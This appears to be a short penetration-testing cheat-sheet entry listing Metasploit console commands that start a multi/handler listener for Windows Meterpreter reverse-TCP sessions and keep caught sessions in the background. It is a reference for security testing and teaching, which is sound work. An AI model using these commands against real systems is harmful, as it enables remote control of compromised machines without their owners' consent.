Multihandler Listener
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set lhost <IP>
msf> set lport <PORT>
msf> set ExitOnSession false
msf> exploit -j
The -j option is to keep all the connected session in the background
Last updated